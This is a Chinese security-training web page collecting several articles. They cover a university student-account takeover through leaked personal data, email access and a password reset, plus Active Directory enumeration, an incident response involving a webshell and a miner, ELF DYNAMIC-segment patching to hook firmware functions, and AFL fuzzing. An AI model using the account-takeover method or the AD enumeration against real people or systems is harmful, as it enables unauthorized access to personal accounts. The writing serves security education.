蚁景网安 - 网络安全人才培养服务提供商

记一次高校学生账户：从无到有

本次记录，意在表明信息收集的强大之处和引起高校对网络安全的重视！看看是如何从无到有的拿到学生账户… 在了解思路过后，可能会被各位大师傅吹… 狗头保命~~~~ 0x01:先看看这个窗口 http://Http://xxx.xxx.xxx.xxx/login 发现密码要么是邮箱找回，要么是手机找回…. 0x02 到现在的思路，大概是 1. 手机验证码爆破，前提：知道学号+手机号+重置密码是发送验证码而不是连接 2. 邮箱验证码爆破，前提：知道学号+邮箱+重置密码是发送验证码而不是连接上面的两种思路，多半悬…. (因为我是先挖好了洞，才写的文章，所有我事先是知道了学号 +手机号….) 验证码处做了校验….这条路堵住了…. 0x03: 看看如何做的信息收集….. （做信息收集的过程，一定要学会常见的excel来进行数据的清洗….，寻找到我们有用的账户…） Google大法… 再经过长达半个小时的搜索，我发现了这样一个公告，没错就是这个公告，让我有了突破的方向… 3、电子邮件的用户名为：学号@xxx.xxx.xxx.cn,初始密码为：xxxx+身份证上生日8位（年月日）。Xxxx.xxx..xxx。 4、网上办事服务大厅账号信息里的电子邮件已默认绑定为学生的电子邮件账户账户的获取不一定要找到用户的密码，改密码也是一种思路，只要能够登录进去，那就什么好说… 从看到这个公告开始，我们的大致思路已经确立起来…. 具体的思路：寻敏感信息---然后通过邮箱去重置她的密码---最终拿到统一身份的账户继续google,发现一处敏感信息泄露….泄露数量100条左右这里有个点提醒下：可能很多学生会修改统一身份认证的密码，但是很多学生绝对不会去改学生邮箱的密码，常常习惯用手机号获取验证码改密码… 而我们改她的密码使用邮箱改密码…. 找到它的邮箱，进行登录好家伙，登录成功…. 0x04: 进统一身份认证了…. 然后我们摸进统一身份认证了…. 于是总结： 1. 总的来说，方法还是依旧是原来的方法，不一样的是，仔细细心… 2. 用于不要低估一个账户所带来的危害，哪怕是低权限的账户，也能把它的毛薅的一干二净…，比如这样…. 3. 改密码的方式有很多，但是推荐使用手机号改密码，永远不要把密码规则公布出来，谁知道会发生什么呢？ 4. 信息收集yyds, 从一位大师傅树立了这样一个观点：渗透测试的过程，就是从信息收集对抗的过程。内网也不例外！！如果收集到很多主机的账户密码，横向的过程就变成了不停的输入账户密码的过程…而且动静还很小…

Active Directory之AD对象

1、概述在这篇文章中，我们将讨论不同的 Active Directory 对象及其基本概念，例如：为什么域中需要 Active Directory 对象如何创建它们？如何枚举 Active Directory 对象 Active Directory 对象 Active Directory 对象是一组表示域中资源的属性。每个 Active Directory 对象都由唯一的 SID（安全标识符）标识，被用来允许或拒绝对域中各种资源的访问。让我们讨论一些属于 Active Directory 的 AD 对象。 2、User Objects (用户对象) 用户对象被分配给域用户帐户，用于获取域资源的访问权限。如果您拥有管理用户对象所需的权限，则可以从 Active Directory 用户和计算机控制台管理这些对象。用户帐户也用于运行程序或系统服务，并由用户SID识别，这与域SID类似，它由域SID和用户RID（相对标识符）组成。 PS C:\Users\scarred.monk> Get-ADUser Scarred.Monk DistinguishedName : CN=Scarred Monk,CN=Users,DC=rootdse,DC=lab Enabled : True GivenName : Scarred Name : Scarred Monk ObjectClass : user ObjectGUID : 2ba8220b-63db-4dda-b6de-095a7fa0da24 SamAccountName : Scarred.Monk SID : S-1-5-21-580985966-21152388 用户对象的 SID 在用户的 SID 值中，S-1-5-21-580985966-2115238843-2989639066 是域 SID（安全标识符），1107 是唯一标识它的用户 RID（相对标识符）。一个SID可以分为以下几个部分： (SID)-(Revision Level)-(Identifier-Authority)-(Sub-Authority1)-(Sub-Authority2)...-(RID) 微软对SID组成部分的描述： SID:SID 中的 S 将上述字符串标识为 SID Revision level:SID 结构的修订版本。迄今为止，这从未改变过并且一直是 1 **Identifier-Authority: **一个 48 位的颁发机构标识符，用于标识发布/创建 SID 的机构。（在上述的例子中，标志符颁发机构的值为 5 Subauthority: 子颁发机构，这是一个变量编号，用于识别SID所描述的用户或组与创建它的机构的关系。 **RID:**相对标识符（RID），它能唯一标识相对于发布SID机构的帐户和组。在域环境中，你会在多个位置看到用户 SID，例如在事件查看器或 ACL 中。SID也被用于安全描述符中，以存储与权限有关的信息。下面是事件日志中用户SID的例子：以下是注册表中用户SID的一个例子：你可以在 Microsoft Docs 中找到常见的 SID 列表。:https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/security-identifiers-in-windows#well-known-sids-all-versions-of-windows 然而，在企业环境中，一个用户可以有一个以上的用户账户来完成不同的任务。例如，一个组织中的系统管理员可以有多个不同的账户，如一个账户用于在分配给他们的笔记本电脑上工作，第二个账户用于在本地域工作，还有几个账户用于在AD林中的其他域工作。要获取 Active Directory 域中所有用户帐户的详细信息，我们可以使用以下命令： PS C:\Users\scarred.monk> Get-ADUser -Filter * 这个命令的输出信息非常多，因为它包含了很多关于所有用户的细节。为了只获取用户的少数属性，我们可以使用cmdlet 的Select-Object （它的别名是Select），只选择我们感兴趣的属性，如SamAccountName、SID、enabled（查看账户是否启用/禁用）。 PS C:\Users\scarred.monk> Get-ADUser -f * |select SamAccountName, SID, enabled SamAccountName SID enabled -------------- --- ------- Administrator S-1-5-21-580985966-2115238843-2989639066-500 True Guest S-1-5-21-580985966-2115238843-2989639066-501 False krbtgt S-1-5-21-580985966-2115238843-298963906 这里可以使用Filter参数获取用户信息。Filter参数使用PowerShell表达式来编写 Active Directory查询字符串。使用 -F 同-Filter。下面是使用 Filter 参数查找以 admin* 开头的用户帐户的示例： PS C:\Users\scarred.monk> Get-ADUser -Filter 'Name -like "admin*"' DistinguishedName : CN=Administrator,CN=Users,DC=rootdse,DC=lab Enabled : True GivenName : Name : Administrator ObjectClass : user ObjectGUID : 061b1157-9a8d-4a34-9304-563a08e3883c SamAccountName : Administrator SID : S-1-5-21-580985 当你以域用户身份登录时，域计算机（在其上进行登录尝试）将请求发送到域控制器以进行身份验证，并询问域控制器为用户帐户分配了哪些权限。验证后，计算机会收到来自域控制器的响应，并使用适当的权限和限制让你登录。这是因为域用户帐户的凭据信息存储在域控制器上，而不是用户登录的本地计算机上。如果要创建新用户可以使用 Cmdlet 的New-ADUser命令： PS C:\> New-ADUser -Name "AD User" -GivenName AD -Surname User -SamAccountName ad.user -UserPrincipalName ad.user@rootdse.org -AccountPassword (ConvertTo-SecureString password@123 -AsPlainText -Force) -PassThru 3、Computer Objects（计算机对象）计算机对象代表加入域并由用户用于登录域的机器。当用户以域用户身份登录计算机时，计算机对象将充当向域验证用户身份的媒介。因此，如果计算机对象从域中删除，用户将无法登录，因为计算机将无法访问域控制器。 PS C:\Users\scarred.monk> Get-ADComputer -f * DistinguishedName : CN=RDSEDC01,OU=Domain Controllers,DC=rootdse,DC=lab DNSHostName : RDSEDC01.rootdse.lab Enabled : True Name : RDSEDC01 ObjectClass : computer ObjectGUID : 032428f5-d629-451b-9d1d-46fce3ec0677 SamAccountName : RDSEDC01$ SID : S-1-5-21-5 所有计算机对象都有自己的机器用户，以$结尾。在这个例子中，计算机对象RDSEDC01的机器账户是RDSEDC01$，这些帐户在域中执行自己的操作。域中具有三种可以算作计算机对象的对象：域控制器域计算机（工作站）成员服务器域控制器域控制器是一个集中式 Windows 服务器，它通过托管 Active Directory 域并向客户端提供身份验证和目录服务来管理域。域控制器只能处理单个域的身份验证请求，但它也可以存储来自林中其他域的对象的部分只读副本（如果它被启用为全局编录服务器）。要检查域控制器，我们可以使用以下命令： PS C:\Users\scarred.monk> Get-ADDomainController ComputerObjectDN : CN=RDSEDC01,OU=Domain Controllers,DC=rootdse,DC=lab DefaultPartition : DC=rootdse,DC=lab Domain : rootdse.lab Enabled : True Forest : rootdse.lab HostName : RDSEDC01.rootdse.lab InvocationId : 85a56dee-48fe-4897-8941-50ed5a196849 IP 域计算机（工作站）域计算机可以由员工使用的个人计算机表示，例如属于域的台式机、笔记本电脑。就 Active Directory 而言，计算机对象与用户对象非常相似，因为计算机对象拥有用户对象的所有属性（计算机对象直接从用户对象类继承）。计算机出现在 Active Directory 中的原因很少，例如需要安全地访问资源、利用 GPO 并为其分配权限。对象类会在后续的有关AD模式和LDAP的文章中详细解释为了加入 Active Directory 域并允许域用户登录到该域，域计算机需要一个安全通道来与域控制器通信。安全通道是指可以传输加密数据的经过身份验证的连接。要创建安全通道，域计算机必须向域控制器提供域计算机帐户的密码。与用户帐户身份验证类似，Active Directory 使用 Kerberos 来验证计算机帐户的身份。域控制器通过关联的计算机对象及其存储的密码验证受信任的域计算机。要检查域计算机，我们可以使用以下命令: PS C:\Users\scarred.monk> Get-ADComputer -Filter * 成员服务器域环境中的成员服务器提供不同的服务。这些服务器根据需要提供的服务类型安装了一个或多个角色，例如 Exchange 服务器、Web 服务器、文件服务器、SQL 服务器等。它们可以是 Windows Server 操作系统或 Linux 操作系统。要检查成员服务器，我们可以使用以下命令： PS C:\Users\scarred.monk> Get-ADComputer -Filter 'operatingsystem -like "*server*"' 让我们来谈谈下一种 AD 对象，即组对象。 4、组对象组对象用于包含许多不同的 Active Directory 对象，例如用户、计算机和其他组。这样做是为了通过将权限分配给一组用户/计算机而不是单个帐户、为组创建委派组策略、创建电子邮件分发列表等，使系统管理员的管理更容易。例如，在一个组织中，不同的团队有不同的组，并根据需要为这些组分配不同的权限。假设有一个名为“DB Admins”的组，该组有权登录并在多个 SQL 服务器上执行少量数据库操作、访问多个 DB 文件共享等。当新用户加入 DB 团队时，IT 团队会将用户添加到该组 (DB ADmins) 中，这将为新用户提供其团队成员拥有的所有访问权限。它节省了 IT 团队为每个用户单独配置权限的时间。要获取 Active Directory 域中所有组的详细信息，我们可以使用以下命令： PS C:\Users\scarred.monk> Get-ADGroup -f * | Select-Object name name ---- Administrators Users Guests Print Operators Backup Operators Replicator Remote Desktop Users Network Configuration Operators Performance Monitor Users Performance Log Users Distributed COM Users IIS_IUSRS Cryptographic Operato 组类型分发组（Distribution Group）分发组（通讯组）是用来在一个组中包括多个用户。当一封电子邮件被发送到一个分发组时，它将被发送到该分发组中的所有用户。例如。名称为Corporate Office的分发组将包括企业办公室的所有用户。当有人向该组发送电子邮件时，它将被发送给所有公司办公室员工。安全组（Security Group）与分发组类似，安全组可以包含用户/计算机帐户或组，用于向组中的用户/计算机提供跨域/林的不同访问和权限。例如，名为 DBAdmins 的安全组可以包含数据库操作团队的所有成员，这些成员可能有权访问多个 SQL 服务器和数据库团队的文件共享。当新的 DB 管理员加入团队时，将用户帐户添加到 DBAdmins 安全组将提供跨 SQL 数据库的所有权限。要获取有关安全组的详细信息，我们可以使用GroupCategory -eq "security"这样的过滤器： PS C:\Users\scarred.monk> Get-ADGroup -Filter {GroupCategory -eq "security"} 每个组类型有三个组作用域： **Domain local（本地域）：**用于仅在创建它的域中管理对不同域资源的访问权限。 **Global（全局）：**用于提供对另一个域中资源的访问。一个全局组可以添加到其他全局和本地组。 **Universal（通用）：**用于定义角色和管理分布在多个域中的资源。如果网络连接了多个分支，则最好仅对很少更改的组使用通用组。 Active Directory 中的一些重要组如下： Admin groups（管理员组）最重要的组是域管理员（Domain Admin）和企业管理员（Enterprise Admins）： Domain Admin（域管理员组）为其域中的成员提供管理员权限。 Enterprise Admins 组提供整个林中的管理员权限。 AD中的其他重要群组除了上面两个重要的组之外，还有其他一些重要的组，你应该注意： Schema Admins：Schema Admins 组的成员可以修改 Active Directory 数据库架构。该组拥有对Acitve Directory架构的完全管理权限 DNSAdmins：如果 DNS 服务器角色安装在域中的域控制器上，则 DNSAdmins 组的成员有权访问/修改网络 DNS 信息。 Shay Ber 发表了一篇文章https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83，解释了 DNSAdmins 组的成员如何以 SYSTEM 用户身份在域控制器中执行代码（任意 DLL）。 Print Operators：如果您在 Print Operators 组中添加用户，则该用户帐户可以登录域控制器。 Protected Users：受保护的用户组允许强制实施帐户的安全。该组的成员在身份验证过程中获得了额外的保护，以防止凭据泄露。 Server Operators：Server Operators 组的成员可以登录到域控制器并管理其配置。它可以创建和管理该域中的用户和组，但不可以管理服务器管理员账户。 Account Operators：Account Operators 组的成员可以创建和修改大多数类型的帐户，包括用户、本地组和全局组的帐户，并且成员可以本地登录到域控制器。但是，帐户操作员组的成员无法管理管理员用户帐户或管理员、Server Operators, Account Operators, Backup Operators,和 Print Operators 。 Backup Operators：Backup Operators的成员有权登录、备份、恢复/修改域控制器中的文件。 Remote Desktop Users：该组的成员可以通过 RDP 登录到域控制器。如果用户已经有权在本地登录域控制器，则将其添加到该组可以允许用户通过 RDP 远程登录域控制器。如果未启用本地登录并将其添加到此组，则您将看到以下警告： Group Policy Creator Owners：组策略创建者所有者的成员可以编辑域中的 GPO。以下是一些高价值组。这些组的成员默认拥有登录域控制器的权限。如果这些组的账户被入侵，那么AD域就很有可能被入侵。 Administrators Domain Admins Enterprise Admins Print Operators Backup Operators Account Operators Custom groups（自定义组）除此之外，组织还为 IT 管理员、IT 服务台、SQL 管理员、应用程序管理员等创建自定义特权组。此外，如果我们向服务器添加其他角色，则会创建组。就像我们添加 DHCP 角色时，创建了 DHCP 管理员组或安装 Microsoft Exchange 时，添加了 Exchange 组织管理员和 Exchange Windows 权限组。要获取详细信息，在微软的文档中还有许多其他组的描述：https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-secu Shared Folders（共享文件夹）共享文件夹也是 Active Directory 中的对象。在 AD 中发布新共享时，会为其创建一个对象。这对于 AD 用户轻松找到所有共享非常有帮助。下面是在 AD 中发布的共享文件夹的屏幕截图：对于渗透测试人员，可以枚举共享以查看哪些是可访问的以及存储在那里的数据。我们可以这样枚举共享： PS C:\> Get-SmbShare Name ScopeName Path Description ---- --------- ---- ----------- ADMIN$ * C:\Windows Remote Admin C$ * C:\ Default share Corporate Files * C:\ADShares\Corporate Files Corporate Files data for 2020 DBA Backup * C:\ADShares\DBA Backup Romania DB Backup IPC$ * Remote IPC IT Tools * 在第下次文章中，我们将介绍组策略，它是 Active Directory 的重要元素之一。我们将讨论什么是组策略、为什么需要它们、如何创建它们、使用组策略可以实现什么，并了解如何枚举和破坏组策略。

AD（Active Directory）基础知识

记一次服务器应急排查"新"路历程

0x01 事情概述前一段时间接到了销售给过来的消息说某单位服务器出现问题了，但是出问题的是某云服务器，出现外联德国的行为，告警行为远控，可能没有日志，还比较急，让先支持处置，有可能的话帮忙溯源好抓人，给了个处置对的第三方师傅。 0x02 分析毕竟给的信息是外联远控，如果是外联的情况下一般就要考虑是否是灰黑产，这种情况下出现在个人终端的可能下要大于服务器，所以这个时候基本上就是杀毒，沙箱运行看是否会出现外联行为，如果是远控类木马的情况下，一般服务器被上传的可能性比较高，钓鱼类的可能是个人终端，这是基于服务关系来分析的。 0x03 远程处置第三方老师傅给了个vpn让先给远程看一下，正常情况下肯定是先要考虑备份镜像，在镜像中做操作，如果需要备份镜像的话这里我推荐使用``FTK``，备份之后再转格使用vm打开就ok了，比较容易上手操作。在物理机上直接操作会破坏证据，但是根据给的外联地址去进行信息搜集肯定是攻击者挂的代理地址，没有实际意义，没有高交互的蜜罐的条件下想要实现反制和溯源的基本上是没有可能的。 0x04 排查火绒杀毒 windows日志查询 eventvwr 发现日志并未被清除，如果说是实现了远控，起码就操作者行为来讲，还是讲武德的。 windows日志分为五类应用程序日志安全日志 Setup日志 #安装日志系统日志 Forwarded Events日志 #转发日志这里主要看应用程序日志和安全日志即可，应用程序日志即安装应用程序产生的事件，安全日志主要记录用户操作产生的日志，例如登入/登出，清除日志等。事实上并没有异常的登录事件，从出现问题到服务器关掉的登录事件以及操作日志来说也没有问题查看定时任务翻了一遍定时任务并未有新创建的定时任务熟悉winserver2012的都清楚装机初始的自动任务都存在，另外无其他特殊的计划任务。 net user 无新增用户就单纯从业务来讲，不牵涉到内网部分，所以也根本不担心内网横向的风险。断网条件下是无法通过查看连接状态判断是什么程序触发的，分析业务盘的文件这个时候服务没有起，可以发现使用的中间件，jar包是2017年的，但是有没有打补丁不清楚，因为我没找到的patch文件以及其它像是weblogic的补丁jar包，这里可能会有人有疑问，没看见包就没打补丁么，不接受杠精提问，只是分析而已，这个时候跟开发和运维对接可以确定中间件服务对公网有映射，查看文件目录，因为查杀结果并没有出来，在文件目录下发现存在恶意文件冰蝎马不是吗？但是问题来了文件的属性日期不会欺骗人，出现问题的时间是今年，但是这个文件属性是去年的，这就有点儿意思了，除非还有一种可能，有其它木马或者说是之前被利用未告警的。查看杀毒结果找到文件分析，该木马家族：CoinMiner的行为特征根据情报库去找归属地是德国的，其实这种情况下已经可以交差了。但是令我比较在意的是中间件的RCE，因为涉及到数据问题，第三方的师傅要求到单位使用镜像内网复现。确实找到了上传点,确定上传路径 xxx/xxx/x/x/x/x/x/x/mages/shell2.jsp http://10.xxxxxxxxxxxxxxxxxx/images/shell2.jsp 连接木马可成功这时候有从云厂商那里要来的日志，量很少，但是没有关于weblogic利用的日志这是比较有意思的，到这里其实只有一种情况，服务器是去年被入侵的，但是收到的通知是异常外联远控，可能只是基于情报库而不是从很长一段时间的监测为根据，只能说是意外发现了。实验推荐实验：内存镜像取证（蚁景网安实验室）　https://www.yijinglab.com/expc.do?ec=ECID6a2f-ed6f-4f85-9363-731535a5c3c4>>

二进制固件函数劫持术-DYNAMIC

背景介绍　固件系统中的二进制文件依赖于特定的系统环境执行，针对固件的研究在没有足够的资金的支持下需要通过固件的模拟来执行二进制文件程序。依赖于特定硬件环境的固件无法完整模拟，需要hook掉其中依赖于硬件的函数。　LD_PRELOAD的劫持　对于特定函数的劫持技术分为动态注入劫持和静态注入劫持两种。静态注入指的是通过修改静态二进制文件中的内容来实现对特定函数的注入。动态注入则指的是在运行的过程中对特定的函数进行劫持，动态注入劫持一方面可以通过劫持PLT表或者GOT表来实现，另一方面可以通过环境变量LD_PRELOAD来实现。　在《揭秘家用路由器0day漏洞挖掘》中作者针对D-link DIR-605L(FW_113)路由器中的Web应用程序boa，通过hook技术劫持 apmib_init()和apmib_get()函数修复boa对硬件的依赖，使得qemu-static-mips可以模拟执行，在文中作者通过LD_PRELOAD环境变量实现对函数的劫持。网上针对LD_PRELOAD的劫持也有大量的描述。但是LD_PRELOAD仍旧不是普适的。　存在的问题　LD_PRELOAD环境变量的开关在编译生成ulibc的时候指定，当关闭该选项的时候，无法使用LD_PRELOAD来预加载指定的动态链接库文件。　固件的二进制文件中会将二进制文件中的Section信息去除掉，只保留下Segment的信息，使得无法通过patchelf来增加动态链接库实现劫持。patchelf 支持对二进制文件的patch修改，或者添加执行过程中的链接lib。　本文方案思路　在ELF文件中，存在DYNAMIC Segment,ld.so通过该段内容来加载程序运行过程中需要的lib文件，图1为在IDA中反编译后查看的DYNAMIC段的内容。图1 Elf32_Dyn结构体数组　DYNAMIC段介绍　dynamic 段开头包含了由N个Elf32_Dyn组成的结构体,该结构体的D_tag代表了结构体的类型。d_un为通过union 联合的指针d_ptr或者对应的结构体的值d_val。 typedef struct { Elf32_Sword d_tag; union { Elf32_Word d_val; Elf32_Addr d_ptr; } d_un; }Elf32_Dyn; 　　d_tag字段保存了类型的定义参数，详见ELF(5)手册。下面列出了动态链接器常用的比较重要的类型值　1-DT_NEEDED 该类型的数据结构保存了程序所需要的共享库的名字相对字符串表的偏移量　2-DT_SYMTAB 动态符号表的地址，对应的节名为.dynsym 　3-DT_HASH 符号散列表的名称，对应的节名为.hash又称为.gnu.hash 　4-DT_STRTAB 符号字符串表的地址，对应的节名为 .dynstr 　5-DT_PLTGOT 全局偏移表的地址　如上各个字段对应到 IDA 中显示如下，d_tag字段代表了动态段的类型，当该值为1的时候。表示程序依赖的共享库的名字，其对应的d_val表示了是要加载的lib的名称在string table中的偏移。　共享库文件名对应的结构体的类型值为0x01,如图2所示，0x4001C4-0x4001E4保存有5个二进制文件所依赖的共享库名字，其D_VAL的值是指向string table的偏移量。图2 DT_NEEDED 共享库依赖图　DYNAMIC段的定位　从二进制文件头起始定位DYNAMIC段的流程如下：　ELF_HEADER->Program Header -> DYNAMIC Program 　ELF_HEADER中保存有Program Header的偏移图3 ELF Header 　Program Header中保存有Dynamic Segment 的相关结构体信息图4 Program Header 　展开该结构体，可以找到Dynamic段在文件中的偏移量0x140h Program Header结构体　DT_NEEDED伪造　动态段由dynamic的结构体数组组成，dynamic的结构体定义如下：　在dynamic和elf_hash之间仍存在一段空余空余可填充空间。本文利用该段空间填充，实现特定lib的加载。　本文方案实验与测试　利用dynamic和elf_hash之间的空余区域，在该区域伪造出新的dynamic的一个数组。如下图，不修改二进制文件大小，伪造增添ibcjson.so,使得二进制文件加载 ibcjson.so。在ibcjson.so中编写对应的劫持函数。　思路：将原有的Elf32_Dyn数组元素依次后移，并在该数组的首部添加伪造的ibcjson.so，该lib的命名可以选用string table中的任一字符串即可。　核心移动代码，将Elf32_Dyn中的元素依次后移一个，dynamic段 dynamic[0]元素作为要伪造填充的数据，在本文的实验中，将dynamic[0]中的value值加1。由于在MIPS下存在大小端两种架构，在小端机器上的代码解决大端架构的填充伪造时要注意大小端的转换问题。 void move_dynamic(char* buf){ int x = 0; Elf32_Dyn* dyn = (Elf32_Dyn *)buf; while(1){ if(dyn[x].d_tag == 0 && dyn[x].d_un.d_ptr == 0){ break; } x++; if(x>100) { printf("Error break\n"); break; } } while(x--){ //printf("the index x is %x\n",x); mem_cpy(&dyn[x],&dyn[x+1],8); } dyn[x+1].d_un.d_val = b2l(l2b(dyn[x+1].d_un.d_val) + 1); } 　测试环境　　TOTOLink N210RE中boa程序，劫持函数参考DIR605A，劫持apmib_init以及apmib_get 　　该固件的ld，关闭了LD_PRELOAD程序选项，未提供/etc/ld.preload 　　劫持函数代码，采用了《揭秘家用路由器漏洞挖掘》提供的示例代码如下,在原有的基础上，增加printf来查看显示是否劫持成功。 #include<stdio.h> #define MIB_HW_VER 0x250 #define MIB_IP_ADDR 170 #define MIB_CAPTCHA 0x2C1 int apmib_init(void){ printf("helllo"); return 1; } int fork(void){ return 0; } void apmib_get(int code,int *value){ switch(code){ case MIB_HW_VER: *value = 1; break; case MIB_IP_ADDR: *value = 1; break; case MIB_CAPTCHA: *value = 1; break; } return; } 　通过mips-linux-gcc进行编译，这里注意mips-linux-gcc在编译过程中的编译文件的位置要位于参数之后（踩坑了!!!!）　mips-linux-gcc -Wall -fPIC -shared apmib.c -o ibcjson.so 　通过如下代码，给原有的boa二进制文件添加一个dynamic #include<stdio.h> #include <stdio.h> #include <stdlib.h> #include "elf.h" #define PATCH "boa_patch" int b2l(int be) { return ((be >> 24) &0xff ) | ((be >> 8) & 0xFF00) | ((be << 8) & 0xFF0000) | ((be << 24)); } char* buf = NULL; int l2b(int le) { return (le & 0xff) << 24 | (le & 0xff00) << 8 | (le & 0xff0000) >> 8 | (le >> 24) & 0xff; } static char *_get_interp(char *buf) { int x; // Check for the existence of a dynamic loader Elf_Ehdr *hdr = (Elf_Ehdr *)buf; Elf_Phdr *phdr = (Elf_Phdr * )(buf + l2b(hdr->e_phoff)); printf("the phdr address is: 0x%x 0x%x 0x%x 0x%x\n",phdr,l2b(hdr->e_phoff),buf,sizeof(hdr->e_phoff)); for(x = 0; x < hdr->e_phnum; x++){ if(l2b(phdr[x].p_type) == PT_DYNAMIC){ // There is a dynamic loader present, so load it return buf + l2b(phdr[x].p_offset); } } return NULL; } int mem_cpy(char* src,char* dst,int len){ printf("the src addr is %x , %x\n",src-buf,dst-buf); for(int x=0;x<len;x++){ dst[x]=src[x]; } return 0; } /* 1 2 3 4 temp = 2 strcpy(1,2) 1 2 strcpy() */ void move_dynamic(char* buf){ int x = 0; Elf32_Dyn* dyn = (Elf32_Dyn *)buf; //Elf32_Dyn tmp_dyn; //mem_cpy() while(1){ if(dyn[x].d_tag == 0 && dyn[x].d_un.d_ptr == 0){ printf("the x is %d\n",x); break; } x++; if(x>100) { printf("Error break\n"); break; } } while(x--){ //printf("the index x is %x\n",x); mem_cpy(&dyn[x],&dyn[x+1],8); } dyn[x+1].d_un.d_val = b2l(l2b(dyn[x+1].d_un.d_val) + 1); //FILE* fw = fopen("") } void analyse(char* buf){ char* phdr_address = NULL; phdr_address = _get_interp(buf); printf("phdr address: 0x%x\n",phdr_address-buf); move_dynamic(phdr_address); } void save_binary(char* buf,int size){ FILE* fw = fopen(PATCH,"wb"); fwrite(buf,size,1,fw); fclose(fw); } int main(int argc,char *argv[],char* envp[]){ if(argc < 2){ printf("not enough argc\n"); } FILE* fp = fopen(argv[1],"rb"); fseek(fp,0,SEEK_END); int size = ftell(fp); fseek(fp, 0L, SEEK_SET); buf = malloc(size); fread(buf,size,1,fp); analyse(buf); save_binary(buf,size); free(buf); return 0; } 　Makefile如下 all: elf.h analyse_ph.c gcc analyse_ph.c -m32 -g3 -o analyse ./analyse boa_real_n210 　针对N210RE 的测试截图如下，通过export LD_LIBRARY_PATH使得程序加载ibcjson.so，成功劫持boa，输出helllo 　Ubuntu下rand函数劫持测试　rand函数的头文件是stdlib.h 　编写rand.c #include<stdio.h> #include<stdlib.h> int main(){ int a = 0; a = rand()%100; printf("the a is %d\n",a); return 0; } //gcc -m32 rand.c -o rand 　编写rand_hook.so #include<stdio.h> int rand(){ printf("hook !\n"); return 100; } //gcc -fPIC -Wall -shared -m32 rand_hook.c -o rand_hook.so 　使用LD_PRELOAD测试，成功实现对该函数的劫持　使用patch，针对dynamic段元素添加伪造，测试rand_patch，依赖的库文件增加了ibc.so.6，ibc.so.6需要通过export LD_LIBRARY_PATH导入ibc.so.6的文件路径　实现对rand的劫持　总结　本文通过研究二进制文件中的dynamic段,通过修改二进制文件增加依赖共享库，可以解决在模拟固件的过程时，固件缺少节信息且固件函数无法通过LD_PRELOAD劫持的问题。该方案仍有不足之处，对于ld加载共享库的依赖顺序、共享库劫持的底层原理尚未深入探究。　参考　《揭秘家用路由器0day挖掘技术》　《二进制分析实战》

某内容管理系统最最最详细的代码审计

AFL--模糊测试使用浅析

一、AFL简介　　AFL（American Fuzzy Lop）是由安全研究员Micha Zalewski 开发的一款基于覆盖引导（Coverage-guided）的模糊测试工具，它通过记录输入样本的代码覆盖率，从而调整输入样本以提高覆盖率，增加发现漏洞的概率。 ①从源码编译程序时进行插桩，以记录代码覆盖率（Code Coverage）； ②选择一些输入文件，作为初始测试集加入输入队列（queue）； ③将队列中的文件按一定的策略进行“突变”； ④如果经过变异文件更新了覆盖范围，则将其保留添加到队列中; ⑤上述过程会一直循环进行，期间触发了crash的文件会被记录下来。　二、AFL安装、测试　1.安装AFL 　下载源码　Make 　llvm_mode安装　之后输入以下命令进行安装　2.AFL测试　下载一个有缺陷的c文件　使用 afl-gcc/afl-clang 编译　生成一些种子语料库　开始fuzz 　提示修改/proc/sys/kernel/core_pattern 　再次运行之前的代码可看到fuzz进度　现在就表示我们的ACL已经安装成功了，注意出现（odd,check syntax!）是表示样例根本没有进入到测试中去，需要调整语料库。　Ctrl+C打断可以在out文件里看见我们的测试信息　3.并行fuzz测试　每个afl-fuzz进程占用CPU的一个核，实际上如果是多核的主机，AFL就可以并行工作　首先先看自己有多少内核　以上可以看出有四个内核意味着可以同时运行4个实例　首先指定主实例 -M 用于主实例，将 -S 添加到所有从属实例。它们可以相互同步　主实例：afl-fuzz -M master -i in/ -o out/ -m none -- ./imgRead_afl @@ 　从实例：afl-fuzz -S slave1 -i in/ -o out/ -m none -- ./imgRead_afl @@ 　在之前的out文件夹会多出俩个不同的文件夹masterh和slave1 　现在尝试假如我们一次性运行5个实例会怎么样　在运行第5个实例后报错，其他实例不受影响，也可以确定4个核在运行中　三、AFL模糊测试libjpeg-turbo 　libjpeg是专门处理Jpeg解码、编码、转码的自由软件库。libjpeg-turbo是其fork版本，还有一个基于libjpeg-turbo的fork的版本是MozJpeg。　1.编译libjpeg-turbo 　首先下载libjpeg-turbo 　之后需要修改cmakelist.txt,进行插桩编译　在cmakelist.txt中，在cmake_minimum_required命令下添加编译器选项，在前面添加，免得被覆盖，进行插桩编译　之后在libjpeg-turbo文件夹下　mkdir build 　cd build 　cmake .. 　make 　sudo make install 　安装好之后build的内容如下　之后利用程序的示例对是否成功安装libjpeg-turbo库进行测试　该函数有俩个参数一个输入文件名，一个作为输出文件名　具体作用就是调用了turbojpeg.h这个库函数对输入的jpg图片进行压缩　因为修改了cmake中的编译器设置，应该库函数里已经是被插过桩的，所以在编译时是可以不用afl-gcc编译也可以进行检测　这样是可以生成可执行文件，也可以实现压缩图片的功能，这里也对之前的样例进行了修改，只接收一个变量，并且不对压缩文件进行保存　但在进行模糊测试时出现以下问题　没有插桩信息，无法进行测试　发现它是动态编译的，虽然应该其动态链接库是插过桩的。但最后已知没有实现。这里最后考虑是想通过链接静态库实现。也是在网上查询未果后，发现在根目录下输入 make test，可以调用他自己的样例进行测试，这其中就包括了静态链接的测试　在一个静态链接测试的项目下，查看其ling.txt,得到静态编译的方式　最后对自己的编译自己的样例　之后开始模糊测试　总共测试次数超过1亿次，开了4个并行　4个样例的的最开始输入都是不一样的，可以从路径速度和总量上看出明显的区别，确实libjpeg-turbo在更新2.0之后，其安全性能得到了极大的提升，没有收到一个报错信息。　2.内存错误检查工具　这里有很多的内存检查工具，这里举个大概，只大概研究ASAN (-fsanitize=address)的使用和与AFL测试的结合　这里测试了几个漏洞文件以此来明晰ASAN的作用　编译文件模板如下　g++ -fsanitize=address -fno-omit-frame-pointer -o t xxx.cpp 　这里只对几种漏洞进行展示　use-after-fee 　可以看到漏洞的名称和发生的内存地址　stack buffer overflow 　还有很多其他类型的漏洞可以进行检测　https://www.jianshu.com/p/3a2df9b7c353 　在AFL中启用ASAN的方式也比较简单　在make时加上AFL_USE_ASAN=1 　注意之后编译文件时需要加上启用asan的参数，不然会报错　3.构造自己的字典　AFL自带自己的一个字典库，主要用于各种变异操作的　如下是AFL的jpeg的字典　为了符合jpeg图片的实际，需要分析在jpeg中出现次数多且固定的字符　这里挑选一些频率较高的字符加入字典　